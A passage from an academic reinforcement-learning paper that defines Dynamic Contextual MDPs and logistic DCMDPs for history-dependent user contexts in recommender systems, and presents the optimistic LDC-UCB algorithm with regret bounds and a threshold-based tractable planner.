robot control, video games, and autonomous vehicles (Afsar et al., 2022; Tessler et al., 2019; Mnih et al., 2015; Fayijie et al., 2018). While typical RL approaches rely on a Markov property of both the reward process and environment dynamics, many scenarios are inherently history-dependent (Bacchus et al., 1996; Ronca and Giacomo, 2021), particularly, when humans are involved. As one example, the behavior of users in recommender systems often exhibits non-Markovian characteristics reflective of a user's latent state, including: user preference elicitation sessions, where users respond to a sequence of feedback-gathering interventions (e.g., ratings, comparisons, annotations) (Chen and Pu, 2012; Zhao et al., 2013); user _ad blindness_ (i.e., the tendency to gradually ignore ads) (Hohnhold et al., 2015); and the long-term evolution of user satisfaction (Wilhelm et al., 2018; Mladenov et al., 2019). Many aspects of a user's latent state determine their disposition towards specific actions. For example, a user's level of frustration, trust, receptivity, and overall satisfaction, may affect their tendency toward accepting recommendations, providing feedback, or abandoning a session. Notably, such features are cumulatively impacted by the user's long-term history, which makes RL especially challenging due to difficult credit assignment, where the impact of any individual action is usually small and noisy. 1 Footnote 1: A similar problem occurs in medical settings, where a patient’s previous reactions to certain treatments could implicitly affect the physician’s receptivity for treatment recommendations over long horizons. Another example includes human driver interventions in autonomous vehicles, where humans may take control of a vehicle for short periods of time. In this paper, we introduce _Dynamic Contextual Markov Decision Processes (DCMDPs)_ to model such environment dynamics in a _history-dependent contextual_ fashion. DCMDPs decompose the state space to include dynamic history-dependent contexts, where each context represents a different MDP, e.g., preferences of a human interacting with an agent, being affected by previous interactions. Particularly, we introduce a special class of _logistic DCMDPs_, in which context dynamics are determined by the aggregation of a set of feature vectors--functions of the immediate context, state and action--over time. This model is inspired by various psychological studies of human learning and conditioning; in particular, the Rescorla-Wagner (RW) model (Rescorla, 1972), a neuroscience model which describes the diminishing impact of repeated exposure to a stimulus due to historical conditioning. Critically, this structure allows us to develop tractable, UCB-style algorithms (Auer et al., 2008) for logistic DCMDPs that break the exponential dependence on history length in general DCMDPs. Our contributions are as follows: (1) We introduce DCMDPs, a model that captures non-Markov context dynamics. (2) We introduce a subclass of DCMDPs for which state-action-context features are aggregated over time to determine context dynamics. We show how such problems can be solved by devising sample efficient and computationally tractable solutions, for which we establish regret bounds. (3) Inspired by our theoretical results, we construct a practical algorithm, based on MuZero (Schrittwieser et al., 2020), and demonstrate its effectiveness on a recommendation system benchmark with long history-dependent contexts. ## 2 Dynamic Contextual MDPs We begin by defining _Dynamic Contextual MDPs (DCMDPs)_, a general framework for modeling history-dependent contexts2. Let \(\mathcal{S}\), \(\mathcal{A}\) and \(\mathcal{X}\) be state, action, and context spaces, with cardinalities \(S,A,X\), respectively. For any time \(t\geq 1\), let \(\mathcal{H}_{t}=\{(s_{1},a_{1},x_{1},\ldots,s_{t},a_{t-1},x_{t-1})\}\) be the set of histories up to time \(t\); and let \(\mathcal{H}=\bigcup_{t}\mathcal{H}_{t}\). We denote \((s_{0},a_{0},x_{0})=\emptyset\). Footnote 2: The term “context”, as opposed to “state”, differentiates between the Markov part of the state and the history dependent part of the state. Additionally, contexts often quantify characteristics of the environment (e.g., types of humans-in-the-loop), which can evolve in a distinct fashion, in contrast to the rest of the state. A DCMDP is given by the tuple \((\mathcal{X},\mathcal{S},\mathcal{A},r,P,H)\), where, \(r:\mathcal{S}\times\mathcal{A}\times\mathcal{X}\mapsto[0,1]\) is a reward function, \(P:\mathcal{H}\times\mathcal{S}\times\mathcal{A}\mapsto\Delta_{\mathcal{S}}\) is a history-dependent transition function, and \(H\) is the horizon. DCMDP dynamics proceeds in discrete episodes \(k=1,2,\ldots,K\). At the beginning of episode \(k\), the agent is initialized at state \(s_{1}^{k}\). At any time \(h\), the agent is in state \(s_{h}^{k}\), has observed a history \(\tau_{h}^{k}=(s_{1}^{k},a_{1}^{k},x_{1}^{k},\ldots,s_{h-1}^{k},a_{h-1}^{k},x_ {h-1}^{k})\in\mathcal{H}_{h}\), and selects an action \(a_{h}^{k}\in\mathcal{A}\). Then, the next context \(x_{h}^{k}\) occurs with (history-dependent) probability \(P(x_{h}^{k}|\tau_{h}^{k})\), the agent receives reward \(r(s_{h}^{k},a_{h}^{k},x_{h}^{k})\), and the environment transitions to state \(s_{h+1}^{k}\) with probability \(P_{h}(s_{h+1}^{k}|s_{h}^{k},a_{h}^{k},x_{h}^{k})\). Note that state transitions are Markov w.r.t. \(s_{h}^{k},a_{h}^{k}\), and the context \(x_{h}^{k}\). A policy \(\pi:\mathcal{S}\times\mathcal{H}\mapsto\Delta_{\mathcal{A}}\) maps states and histories to distributions over actions. The value of \(\pi\) at time \(h\) is defined as \(V_{h}^{\pi}(s,\tau)=\mathbb{E}_{\pi}\Big{[}\sum_{t=h}^{H}r(s_{t},a_{t},x_{t}) \Big{]}\ s_{h}=s,\tau_{h}=\tau\Big{]}\), where \(a_{t}\sim\pi(s_{t},\tau_{t})\), and \(x_{t}\sim P(\cdot|\tau_{t})\). An optimal policy \(\pi^{*}\) maximizes the value over all states and histories3; we denote its value function by \(V^{*}\). We measure the performance of an RL agent by its _regret_ - the difference between its value and that of an optimal policy: \(\text{Reg}(K)=\sum_{k=1}^{K}V_{1}^{*}(s_{1}^{k})-V_{1}^{\pi^{k}}(s_{1}^{k})\). Footnote 3: Such a value always exists, since all histories can be represented as states of an equivalent MDP, for which an optimal value exists. Figure 1 depicts causal diagrams comparing different types of DCMDPs, including three special cases: Contextual MDPs (Hallak et al., 2015)4, Markov DCMDPs, and logistic DCMDPs (defined in the next two sections). In the next section, we describe a simple instance of DCMDPs, for which contexts are Markov, and show that standard MDP solutions can be applied. Then, in Section 3, we describe a more general DCMDP model, which uses aggregated features to represent histories, for which we provide sample efficient solutions and strong regret guarantees. Footnote 4: To see that Contextual MDPs are a special case of DCMDPs for discrete \(\mathcal{X}\), define \(P(x_{t}|\tau_{t})=\mathds{1}\{x_{t}=x_{t-1}\}\), fixing the context across transitions. ### Markov DCMDPs As a warm-up, we consider a simple version of DCMDPs in which context distributions are Markov w.r.t. the state and previous context. Specifically, we define a _Markov DCMDP_ as a DCMDP which satisfies for all \(h\in[H]\), \(\tau_{h}=(x_{1},s_{1},a_{1},\ldots,x_{h-1},s_{h-1},a_{h-1})\in\mathcal{H}_{h}\) \[P(x_{h}|\tau_{h})=P(x_{h}|s_{h-1},a_{h-1},x_{h-1}).\] A Markov DCMDP \(\mathcal{M}=(\mathcal{X},\mathcal{S},\mathcal{A},r,P,H)\) can be reduced to an MDP by augmenting the state space to include the context. To see this, we define the augmented MDP \(\overline{\mathcal{M}}=(\bar{\mathcal{S}},\mathcal{A},\bar{r},\bar{P},H)\), where \(\bar{\mathcal{S}}=\mathcal{S}\times\mathcal{X}\) and \(\bar{r}(\bar{s}_{t},a_{t})=r(s_{t},a_{t},x_{t})\), \(\bar{P}(\bar{s}_{t+1}|\bar{s}_{t},a_{t})=P(s_{t+1}|s_{t},a_{t},x_{t})P(x_{t+1}| s_{t},a_{t},x_{t})\). As a consequence, the Markov DCMDP \(\mathcal{M}\) and the MDP \(\overline{\mathcal{M}}\) have the "same" optimal policy and value, and \(\mathcal{M}\) can be solved using standard RL methods. For instance, using UCBVI (Azar et al., 2017) one can obtain a regret of \(\text{Reg}(K)\leq\tilde{\mathcal{O}}\Big{(}\sqrt{\bar{H}^{3}SAXK}\Big{)}\). Markov DCMDPs also generalize contextual MDPs in an especially simple way; but they fail to capture the history dependence of contexts embodied by general DCMDPs. In the next section, we turn to a special case of DCMDPs that does so, but also admits tractable solution methods. ## 3 Logistic DCMDPs We introduce a general class of DCMDPs, called _logistic DCMDPs_, where history dependence is structured using an aggregation of state-action-context-dependent features. Unlike Markov DCMDPs, logistic DCMDPs allow for context transitions to depend on history. We define the softmax function \(z_{i}:\mathbb{R}^{M}\mapsto[0,1]\), with temperature \(\eta>0\) as \[z_{i}(\mathbf{u})=\frac{\exp(\eta u_{i})}{1+\sum_{m=1}^{M}\exp(\eta u_{m})} \tag{1}\] for \(i\in[M]\), \(\mathbf{u}\in\mathbb{R}^{M}\), and \(z_{M+1}(\mathbf{u})=1-\sum_{i=1}^{M}z_{i}(\mathbf{u})\). **Definition 3.1** (Logistic DCMDP).: A _logistic DCMDP_ with latent feature maps \(\left\{\mathbf{f}_{h}^{*}:\mathcal{S}\times\mathcal{A}\times\mathcal{X}\mapsto \mathbb{R}^{M}\right\}_{h=0}^{H-1}\) is a DCMDP with context space \(\mathcal{X}=\left\{x^{(i)}\right\}_{i=1}^{M+1}\), which satisfies, for all \(h\in[H]\), \(\tau_{h}=(s_{1},a_{1},x_{1},\ldots,s_{h-1},a_{h-1},x_{h-1})\in\mathcal{H}_{h}\), and \(i\in[M+1]\): \[P_{\mathbf{f}^{*}}(x_{h}^{(i)}|\tau_{h})=z_{i}\Biggl{(}\sum_{t=0}^{h-1}\alpha^{h- t-1}\mathbf{f}_{t}^{*}(s_{t},a_{t},x_{t}))\Biggr{)},\] where \(\alpha\in[0,1]\) is a _history discount factor_. Note that the latent functions \(\mathbf{f}_{h}^{*}\) are vector-valued and _unknown_. In a recommender system, \(\mathbf{f}_{h}^{*}\) may represent a user's unknown degree of trust in the system, or the effect of a sequence of recommendations on their satisfaction. The discount \(\alpha\) allows for immediate effects to diminish over time (if less than 1). A logistic DCMDP is denoted by \((\mathcal{X},\mathcal{S},\mathcal{A},r,P,H,\mathbf{f}^{*},\alpha)\). We assume \(\mathbf{f}^{*}\) is \(\ell_{2}\)-bounded with \(\sqrt{\sum f_{h,i}^{*2}(s,a,x)}\leq L\), and we denote \[\mathcal{F}=\{\mathbf{f}:|f_{h,i}(s,a,x)|\leq b_{h,i}(s,a,x)\} \tag{2}\] the (rectangular) set where \(b_{h,i}(s,a,x)\) are upper bounds on \(\mathbf{f}^{*}\). Throughout our analysis we denote the effective history horizon \(H_{\alpha}=\frac{\alpha^{2H}-1}{\alpha-1}\), and without loss of generality scale transitions in \(z_{i}\) (Equation (1)) with temperature \(\eta=H_{\alpha}^{-1}\).5 For clarity, we write \(r(s,a,x^{(i)})=r_{i}(s,a)\), \(P(s^{\prime}|s,a,x^{(i)})=P_{i}(s^{\prime}|s,a)\), and \(\mathbf{r}(s,a)=(r_{1}(s,a),\ldots,r_{M+1}(s,a))^{T}\), \(\mathbf{P}(s^{\prime}|s,a)=(P_{1}(s^{\prime}|s,a),\ldots,P_{M+1}(s^{\prime}|s,a))^ {T}\). We also denote by \(n_{h}^{k}(s,a,x)\) the number of visits to \(s,a,x\) at time step \(h\) of episode \(k-1\). Footnote 5: We set \(\eta=H_{\alpha}^{-1/2}\) for convenience. Different choices of \(\eta\) are equivalent to varying the bounds on \(\mathcal{F}\) in Equation (2). Next, we define a sufficient statistic for logistic DCMDPs that will prove valuable in our solution methods that follow. **Definition 3.2** (Sufficient Statistic).: Given a logistic DCMDP with feature maps \(\mathbf{f}\), define \(\mathbf{\sigma}:\mathcal{H}\mapsto R^{M}\) as \(\mathbf{\sigma}(\tau_{h};\mathbf{f}):=\sum_{t=0}^{h-1}\alpha^{h-t-1}\mathbf{f}_{t}(s_{t}, a_{t},x_{t})\), and the set of sufficient statistics by \(\mathbf{\Sigma}(\mathbf{f}):=\{\mathbf{\sigma}(\tau;\mathbf{f})\}_{\tau\in\mathcal{H}}\). In Appendix B.1, we prove that \(\mathbf{\sigma}(\tau_{h};\mathbf{f})\) is a sufficient statistic of the history for purposes of computing the optimal policy at time \(h\). We do so by defining an equivalent MDP with state space \(\mathcal{S}\times\mathbf{\Sigma}(\mathbf{f})\) with well-defined dynamics and reward, and an equivalent optimal policy, which achieves the same optimal value. Finally, similar to previous work on logistic and multinomial bandits (Abeille et al., 2021; Amani and Thrampoulidis, 2021), we define a problem-dependent constant for logistic DCMDPs which plays a key role in characterizing the behavior of \(M\geq 1\) multinomial logit bandit algorithms. For \(\mathbf{x}\in\mathbb{R}^{M+1}\) and \(\tau\in\mathcal{H}\), let \(\mathbf{z}(\mathbf{x})=(z_{0}(\mathbf{x}),\ldots,z_{M+1}(\mathbf{x}))^{T}\), \(\mathbf{A}(\mathbf{\tau};\mathbf{f})=\text{diag}(\mathbf{z}(\mathbf{\sigma}(\mathbf{\tau};\mathbf{f})))- \mathbf{z}(\mathbf{\sigma}(\mathbf{\tau};\mathbf{f}))\mathbf{z}(\mathbf{\sigma}(\mathbf{\tau};\mathbf{f}))^{T}\), and \(1/\kappa=\inf_{\tau\in\mathcal{H}}\lambda_{\min}\{\mathbf{A}(\mathbf{\tau};\mathbf{f}^{*})\}\). Informally, \(\kappa\) is related to saturation of the softmax \(z_{i}\). For logistic DCMDPs, it is related to a worst-case context distribution w.r.t. \(\mathbf{f}^{*}\) and \(\tau\in\mathcal{H}\). We refer to Abeille et al. (2021); Amani and Thrampoulidis (2021) for details, as well as lower bounds using this constant in logistic bandits. The Rescorla-Wagner Model in Recommenders.Before continuing to provide sample efficient methods for solving logistic DCMDPs, we turn to motivate the aggregated model of history through the lens of the Rescola-Wagner (RW) model (Rescorla, 1972) in a recommendation setting. Logistic DCMDPs generate context transitions based on the sum of specific features of prior states, actions, and contexts, as captured by \(\mathbf{f}^{*}\), with backward discounting to diminish the effect of past features or experiences, as captured by \(\alpha\). Such a model can be used to capture a (very simple) RW formulation of user behavior in an interactive recommender system. Let \(I=\{i_{1},\ldots,i_{n}\}\) be a set of items. A user may like, dislike, or be unfamiliar with any of these items, represented by \(u\in\{1,0,-1\}^{n}\). Let \(g_{t}\) be the user's (latent) current degree of satisfaction or engagement with the system. At each time \(t\), the system asks the user for their disposition (e.g., rating) of an item \(i_{t}\in I\). The user decides to answer the question with probability \(z_{1}(g_{t})\) (Equation (1)), which is strictly increasing with higher degrees of engagement level. The engagement level then evolves as \(g_{t+1}=\alpha g_{t}+\beta u_{i_{t}}\), where \(\alpha\in[0,1]\), and \(\beta\) is a user-specific sensitivity factor. This model gives rise to a logistic DCMDP, whose solution gives the optimal recommender system policy. Specifically, actions \(a_{t}:=i_{t}\in I\) are the questions asked by the system, \(f^{*}(s_{t},a_{t},x_{t})=\beta u_{a_{t}}\) depends only on \(a_{t}\), user engagement is \(g_{h}=\sum_{t=0}^{h-1}\alpha^{h-t-1}f^{*}(s_{t},a_{t},x_{t})=\sum_{t=0}^{h-1} \alpha^{h-t-1}\beta u_{i_{t}}\), \(x_{t}\) is the decision whether to answer, and \(s_{t}\) is the observation of the answer. ## 4 Optimistic Methods for Logistic DCMDPs Logistic DCMDPs' aggregation of features allow us to obtain sample efficient and computationally tractable solutions; namely, solutions which do not depend exponentially on history. In this section, we describe an optimistic algorithm for solving logistic DCMDPs and provide regret bounds. We focus on theoretical motivations here, and address computational tractability in the next section. We first develop _Logistic Dynamic Context Upper Confidence Bound (LDC-UCB)_, a general RL method for logistic DCMDPs with unknown latent features (see Algorithm 1). At each episode \(k\), LDC-UCB uses estimates of rewards \(\hat{r}^{k}_{x,h}(s,a)=\frac{\sum_{k^{\prime}=1}^{k}\boldsymbol{1}\left\{x_{ n}^{k^{\prime}}=x,s_{n}^{k^{\prime}}=s,a_{h}^{k^{\prime}}=a\right\}r_{n}^{k^{ \prime}}}{n_{n}^{k}(s,a,x)}\), transitions \(\hat{P}^{k}_{x,h}(s^{\prime}|s,a)=\frac{\sum_{k^{\prime}=1}^{k}\boldsymbol{1} \left\{x_{k^{\prime}}^{k^{\prime}}=x,s_{k^{\prime}}^{k^{\prime}}=s,a_{h^{ \prime}}^{k^{\prime}}=a,s_{h^{\prime}+1}^{k^{\prime}}=s^{\prime}\right\}}{n_{ n}^{k}(s,a,x)}\), and a projected estimate of \(\hat{\boldsymbol{f}}\), calculated by maximizing the regularized log likelihood: \[\mathcal{L}^{k}_{\lambda}(\boldsymbol{f})=\sum_{k^{\prime}=1}^{k} \sum_{h=1}^{H-1}\sum_{i=1}^{M+1}\mathds{1}\big{\{}x_{h}^{k}=i\big{\}}\ell_{i,h} ^{k}(\boldsymbol{f})-\lambda\left\|\boldsymbol{f}\right\|_{2}^{2}, \tag{3}\] where \(\ell_{i,h}^{k}(\boldsymbol{f})=\log\bigl{(}z_{i}(\boldsymbol{\sigma}(\tau_{h} ^{k};\boldsymbol{f}))\bigr{)}\), \(\lambda>0\), and recall that \(\boldsymbol{\sigma}(\tau_{h}^{k};\boldsymbol{f})=\sum_{t=0}^{h-1}\alpha^{h-t-1 }\boldsymbol{f}_{t}(s_{t}^{k},a_{t}^{k},x_{t}^{k})\). We account for uncertainty in these estimates by incorporating optimism. For rewards and transitions, we add a bonus term \(b_{i,h}^{k}\) (see Appendix C for explicit definitions) to the estimated reward (line 2). To incorporate optimism in the latent features \(\hat{\boldsymbol{f}}\), we build on results from multinomial logistic bandits (Amani and Thrampoulidis, 2021). Specifically, we derive a confidence bound over \(\hat{\boldsymbol{f}}\), for which with probability at least \(1-\delta\) \[\left\|g_{k}(\boldsymbol{f}^{*})-g_{k}(\hat{\boldsymbol{f}}_{t})\right\|_{ \boldsymbol{H}_{k}^{-1}(\boldsymbol{f}^{*})}\leq\beta_{k}(\delta), \tag{4}\] where \(H_{k}(\boldsymbol{f})=-\nabla_{\boldsymbol{f}}^{2}\mathcal{L}^{k}_{\lambda}( \boldsymbol{f})\), \(g_{k}(\boldsymbol{f})=-\nabla_{\boldsymbol{f}}\mathcal{L}^{k}_{\lambda}( \boldsymbol{f})+D_{k}\), \(\beta_{k}(\delta)=\frac{M^{5/2}SAH}{\sqrt{\lambda}}\bigl{(}\log\bigl{(}1+\frac{ k}{d\lambda}\bigr{)}+2\log\bigl{(}\frac{2}{\delta}\bigr{)}\bigr{)}+\sqrt{\frac{ \lambda}{4M}}+\sqrt{\lambda}L\). See Appendix G for exact expressions and a proof of the bound in Equation (4). Next, we leverage the bound in Equation (4) to construct a feasible set of logistic DCMDPs. Specifically, we define the confidence set \[\mathcal{C}_{k}(\delta)=\bigg{\{}\boldsymbol{f}\in\mathcal{F}: \left\|g_{k}(\boldsymbol{f})-g_{k}(\hat{\boldsymbol{f}}_{t})\right\|_{ \boldsymbol{H}_{k}^{-1}(\boldsymbol{f})}\leq\beta_{k}(\delta)\bigg{\}}. \tag{5}\] and the following set of logistic DCMDPs: \[\bar{\mathcal{M}}_{k}(\delta)=\Big{\{}\Big{(}\mathcal{X},\mathcal{S}, \mathcal{A},\bar{r},\hat{P},H,\boldsymbol{f},\alpha\Big{)}:\boldsymbol{f}\in \mathcal{C}_{k}(\delta)\Big{\}}. \tag{6}\] The optimistic policy \(\bar{\pi}^{k}\) (line 3) is that with greatest value over all DCMDPs in \(\bar{\mathcal{M}}_{k}(\delta)\), i.e., \(\bar{\pi}^{k}\) corresponding to \(\max_{\bar{m}\in\bar{\mathcal{M}}_{k}(\delta)}V^{*}(s_{1};\bar{m})\). Combining the above, we prove the following regret guarantee for Algorithm 1. **Theorem 4.1**.: _Let \(\lambda=\Theta\bigl{(}\frac{HM^{2.5}SA}{L}\bigr{)}\). With probability at least \(1-\delta\), the regret of Algorithm 1 is_ \[\operatorname{Reg}(K)\leq\tilde{\mathcal{O}}(\sqrt{H^{6}M^{4.5}S^{2}A^{2}L^{2} \kappa K}).\] The proof of Theorem 4.1 can be found in Appendix C. We note that computing the optimistic policy over \(\bar{\mathcal{M}}_{k}(\delta)\) (line 3) is computationally difficult, especially due the history dependence of \(\pi\) on the accumulated latent features \(\sum_{t=1}^{h}\alpha^{h-t}\boldsymbol{f}(s_{t},a_{t},x_{t})\). We address this challenge next. ## 5 Mitigating Computational Complexity In this section we show how to relax LDC-UCB (Algorithm 1) to mitigate its high computational complexity. Importantly, we maintain regret guarantees similar to those of Theorem 4.1 while obtaining an exponential improvement to computational cost. We later use these results to construct a practical model-based algorithm in Section 6. To address the computational challenges of Algorithm 1, we focus on two problems. The first involves the set \(\mathcal{C}_{k}(\delta)\) (Equation (5) and line 5 of Algorithm 1) - where computation of the maximum likelihood constrained to set \(\mathcal{C}_{k}(\delta)\) is intractable. To address this, we prove that the constraint on the maximum likelihood estimator can be replaced by a simpler, rectangular set, enabling efficient calculation of the projected maximum likelihood. The second challenge is the complexity of the optimistic planner (Equation (6) and line 3 of Algorithm 1). To overcome this, we develop a _local_ confidence bound, for every state-action-context triple \((s,a,x)\), and show it can be leveraged to design an optimistic planner, using a novel thresholding mechanism for optimism in logistic DCMDPs. Pseudocode for this tractable variant of LDC-UCB is presented in Algorithm 2. ### A Tractable Estimator We begin by constructing a tractable estimator for the latent feature maps \(\mathbf{f}^{*}\) which, instead of projecting to the set \(\mathcal{C}_{k}(\delta)\), solves for projected maximum likelihood on the rectangular set \(\mathcal{F}\) (Equation (2)). Let \(\gamma_{k}(\delta)=\Big{(}2+2L\sqrt{MH}+\sqrt{2(1+L)}\Big{)}\beta_{k}\,+\,\sqrt {\frac{2(1+L)HM}{\lambda}}\beta_{k}^{2}(\delta)\). We define the tractable maximum likelihood estimator \(\hat{\mathbf{f}}^{k}_{T}\in\arg\max_{\mathbf{f}\in\mathcal{F}}\mathcal{L}_{\lambda}^{ k}(\mathbf{f}),\) and have the following bound. **Lemma 5.1**.: _With probability at least \(1-\delta\), for all \(k\in[K]\),_ \[\Big{\|}\hat{\mathbf{f}}^{k}_{T}-\mathbf{f}^{*}\Big{\|}_{\mathbf{H}_{k}(\mathbf{f}^{*})}\leq \gamma_{k}(\delta). \tag{7}\] The proof (see Appendix G.2) uses a convex relaxation of the set \(\mathcal{C}_{k}(\delta)\). Notice that the confidence region for \(\hat{\mathbf{f}}^{k}_{T}\) is looser than that for \(\hat{\mathbf{f}}^{k}\) (see Equation (4)), as \(\beta_{k}(\delta)<\gamma_{k}(\delta)\). Nevertheless, its computation is tractable. Next we can exploit the confidence bound in Equation (7) to construct a _local_ bound for every state-action-context triple \((s,a,x)\) using the number of visits to \((s,a,x)\), i.e., \(n^{k}_{h}(s,a,x)\). The following result uses structural properties of logistic DCMDPs to achieve a local bound for \(\hat{\mathbf{f}}^{k}_{T}\). Its proof generalizes the local confidence bound in Tennenholtz et al. (2022), and can be found in Appendix G.3. **Lemma 5.2** (Local Estimation Confidence Bound).: _For any \(\delta>0\), with probability of at least \(1-\delta\), for all \(k\in[K],h\in[H],i\in[M]\) and \(s,a,x\in\mathcal{S}\times\mathcal{A}\times\mathcal{X}\), it holds that_ \[\Big{|}\big{(}\hat{\mathbf{f}}^{k}_{T}(s,a,x)\big{)}_{i,h}-\big{(}\mathbf{f}^{*}(s,a,x )\big{)}_{i,h}\Big{|}\leq\frac{2\sqrt{\kappa}\gamma_{k}(\delta)}{\sqrt{n^{k}_ {h}(s,a,x)+4\lambda}}.\] Lemma 5.2 allows one to reason about the unknown features locally for any visited \((s,a,x)\), a vital step toward an efficient optimistic planner. Indeed, as we see in the next section, the cost of planning in logistic DCMDPs can be reduced significantly using this bound. ### Threshold Optimistic Planning We now address the major computational challenge of Algorithm 1 - the complexity of optimistic planning (line 3 of Algorithm 1). To do this, we leverage the local bound in Lemma 5.2 and construct an optimistic planner using a novel threshold mechanism, as we describe next. Recall the set of sufficient statistics \(\mathbf{\Sigma}(\mathbf{f})=\{\mathbf{\sigma}(\tau;\mathbf{f})\}_{\tau\in\mathcal{H}}\) (Definition 3.2), which is a finite, vector-valued set with cardinality \(|\mathbf{\Sigma}(\mathbf{f})|=\mathcal{O}\big{(}(SAMH)^{MH}\big{)}\), making planning in state space \(S\times\mathbf{\Sigma}\) exponentially hard. Consequently, searching for the optimistic DCMDP in the space of feature maps satisfying \(\mathbf{f}\in\mathcal{C}_{k}(\delta)\) (Equation (6)) requires searching over an exponentially large space. We mitigate this problem exponentially, by leveraging the local confidence bound in Lemma 5.2. Let \(\mathcal{B}_{k}(\delta)\subset\mathbb{R}^{M}\times\mathbb{R}^{M}\) be the rectangular cuboid of all candidate confidence intervals satisfying the bound in Lemma 5.2. That is, \(\mathcal{B}_{k}(\delta)\) is the set of all \(M\) dimensional intervals \(\Big{[}\hat{\mathbf{l}}^{k}_{h}(s,a,x),\mathbf{u}^{k}_{h}(s,a,x)\Big{]}\), such that for all \(h,s,a,x\), \(\mathbf{f}^{*}_{h}(s,a,x)\in\Big{[}\mathbf{l}^{k}_{h}(s,a,x),\mathbf{u}^{k}_{h}(s,a,x)\Big{]}\), where, \(\mathbf{u}^{k}_{h}(s,a,x),\mathbf{l}^{k}_{h}(s,a,x)=\hat{\mathbf{f}}^{k}_{T}\pm\bigg{(} \frac{2\sqrt{\kappa}\gamma_{k}(\delta)}{\sqrt{n^{k}_{h}(s,a,x^{(1)})+4\lambda} },\dots,\frac{2\sqrt{\kappa}\gamma_{k}(\delta)}{\sqrt{n^{k}_{h}(s,a,x^{(M)})+4 \lambda}}\bigg{)}^{T}\). In what follows, we identify key characteristics of the optimistic value when optimized over \(\mathcal{B}_{k}(\delta)\). Specifically, we show that an optimistic solution lies on the extreme points of \(\mathcal{B}_{k}(\delta)\), but more importantly, at one of \(M\)_specific extreme points_. This limits the search required by optimistic planning to a much smaller set, which can be approximated effectively in practice. Optimism in intervals.Instead of augmenting the state space with \(\mathbf{\Sigma}(\mathbf{f})\), we use the set of confidence intervals defined by \(\mathcal{B}_{k}(\delta)\). We denote by \(\mathbf{CI}^{k}_{h}:\mathbf{\Sigma}(\hat{\mathbf{f}}^{k})\mapsto\mathbb{R}^{M}\times \mathbb{R}^{M}\) the confidence interval of the sufficient statistic \(\mathbf{\sigma}(\tau^{k}_{h},\hat{\mathbf{f}}^{k})\). That is, \[\mathbf{CI}^{k}_{h}=\mathbf{CI}(\mathbf{\sigma}(\tau^{k}_{h};\hat{\mathbf{f}}^{k}))\] \[=\left[\sum_{t=0}^{h-1}\alpha^{h-t-1}\mathbf{l}^{k}_{h}(s^{k}_{t},a^{k }_{t},x^{k}_{t}),\sum_{t=0}^{h-1}\alpha^{h-t-1}\mathbf{u}^{k}_{h}(s^{k}_{t},a^{k}_{ t},x^{k}_{t})\right]\!.\] We also denote by \(\mathbf{\mathcal{I}}^{k}=\Big{\{}\mathbf{CI}(\mathbf{\sigma}(\tau,\hat{\mathbf{f}}^{k}_{T})) \Big{\}}_{\tau\in\mathcal{H}}\) the set of possible confidence intervals over \(\mathcal{B}_{k}(\delta)\) in episode \(k\). Next, we augment the state space \(\mathcal{S}\) at every episode \(k\) by \(\mathcal{S}\times\mathbf{\mathcal{I}}^{k}\), and define the augmented state-action optimistic value for context \(i\in[M+1]\) and confidence interval \(\mathbf{CI}^{k}_{h}=\mathbf{CI}(\mathbf{\sigma}(\tau^{k}_{h},\mathbf{f}^{k}))\) at time step \(h\in[H]\) by \[\bar{Q}_{i}(s,a,\mathbf{CI}^{k}_{h}))=\bar{r}_{i}(s,a)+\mathbb{E}_{s^{\prime}\sim \hat{P}_{i}(\cdot|s,a)}\Big{[}\bar{V}_{h+1}(s^{\prime},\mathbf{CI}^{k}_{h+1})\Big{]},\] where, with slight abuse of notation, we used \(\mathbf{CI}^{k}_{h+1}=\mathbf{CI}\Big{(}\mathbf{\sigma}\Big{(}\tau^{k}_{h}\cup\big{\{}s,a,x ^{(i)}\big{\}},\hat{\mathbf{f}}^{k}_{T}\Big{)}\Big{)}\) to denote the next aggregated confidence interval. The optimistic value \(\bar{V}_{h}\) is defined by maximizing over sufficient statistics in the confidence set \(\mathbf{CI}^{k}_{h}\) and \(a\in\mathcal{A}\). That is, \[\bar{V}_{h}(s,\mathbf{CI}^{k}_{h})=\max_{a\in\mathcal{A}}\max_{\mathbf{\sigma}\in\mathbf{CI }^{k}_{h}}\sum_{i=1}^{M+1}z_{i}(\mathbf{\bar{\sigma}})Q_{i}(s,a,\mathbf{CI}^{k}_{h}) \tag{8}\] Indeed, \(\bar{V}_{h}\) is an optimistic value, as shown by the following proposition. Its proof is provided in Appendix D.3. **Proposition 5.3** (Optimistic Value).: _Let \(\bar{V}_{h}\) as defined in Equation (8). Then, w.h.p. \(\bar{V}_{1}(s^{k}_{t},\mathbf{CI}^{k}_{h})\geq V_{1}^{*}(s^{k}_{t})\)._ Next, we turn to show that the maximization problem in Equation (8) can be solved efficiently, though \(\mathbf{CI}_{h}^{k}\) is an exponentially large set. Notice that the inner term \(\sum_{i=0}^{M}z_{i}(\bar{\mathbf{\sigma}})Q_{i}(s,a,\mathbf{CI}_{h}^{k})\) in Equation (8) is not convex. Still, our analysis shows that a solution to the inner maximization problem lies in the set of extreme points of \(\mathbf{CI}_{h}^{k}\). That said, these \(2^{M}\) extreme points make exhaustive search intractable. Fortunately, we can also show that the optimal solution lies in a space of exactly \(M\) solutions - a linearly sized, tractable search space. To this end, we define the threshold set, which we will use to construct the (linear) set of feasible extreme points. **Definition 5.4**.: For a rectangular cuboid defined by the interval \(\mathbf{CI}=[\mathbf{l},\mathbf{u}]\subseteq\mathbb{R}^{M+1}\times\mathbb{R}^{M+1}\), vector \(\mathbf{y}\in\mathbb{R}^{M+1}\) and real number \(t\in\mathbb{R}\) we define \(\mathbf{th}_{t}(\mathbf{y},\mathbf{CI})\in\mathbb{R}^{M+1}\) by \[\left[\mathbf{th}_{t}(\mathbf{y},\mathbf{CI})\right]_{i}=\begin{cases}l_{i}&y_{i}<t\\ u_{i}&\text{o.w.}\end{cases}\] **Definition 5.5**.: For a vector \(\mathbf{Q}\in\mathbb{R}^{M+1}\), we define the threshold set \(\mathcal{T}(\mathbf{Q})=\left\{\frac{Q_{i}+Q_{i+1}}{2}\right\}_{i=1}^{M}\). We use these definitions to show that the optimal solution to Equation (8) lies in the threshold set of \(Q\)-values (see proof in Appendix F.1). **Lemma 5.6** (Threshold Optimism).: _Let \(\mathbf{Q}\in\mathbb{R}^{M+1}\). For any \(\mathbf{x}\in\mathbb{R}^{M+1}\) such that \(x_{i}=0\) define \(f(\mathbf{x})=\sum_{i=1}^{M+1}z_{i}(\mathbf{x})Q_{i}\). Let 